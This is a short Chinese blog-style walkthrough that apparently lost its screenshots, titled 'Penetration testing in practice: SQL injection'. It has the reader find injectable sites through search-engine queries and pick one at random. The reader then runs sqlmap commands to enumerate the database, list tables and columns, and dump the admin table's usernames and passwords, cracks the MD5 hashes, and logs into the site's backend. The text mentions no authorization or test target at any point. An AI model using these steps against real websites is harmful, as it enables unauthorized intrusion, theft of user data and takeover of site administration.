渗透测试实战_sql注入

首先我们在搜索引擎上寻找可以注入的网站。这里额外插一句,搜索引擎也是有特定的语法哦~

渗透测试实战_sql注入

随便找个网站

渗透测试实战_sql注入

下面我们要用sqlmap进行爆破啦,眼睛睁大~

对于sqlmap的安装,直接在python2.7的环境下执行 pip install sqlmap

渗透测试实战_sql注入

此时sqlmap已经安装完毕,可以输入sqlmap确认一下,出现下图说明安装成功了

渗透测试实战_sql注入

下面我们输入sqlmap.py -u "url" --current-db 获取待注入网站的数据库

渗透测试实战_sql注入

输入sqlmap.py -u "url" --current-user 获取当前用户

渗透测试实战_sql注入

输入 sqlmap.py -u "url" -D databasename --tables 获取当前数据库所有的表

渗透测试实战_sql注入

输入sqlmap.py -u "url" -D databasename -Tadmin --columns 获取admin表的所有字段

渗透测试实战_sql注入

输入sqlmap.py -u "url" -D databasename -T admin -C "id,userid,password" --dump

获取所有字段内容(脱库)

渗透测试实战_sql注入

此时我们发现这里的密码是md5加密的,我们可以用去执行解密

渗透测试实战_sql注入

现在我们已经破解了用户名和密码,可以登录网站后台了

相关推荐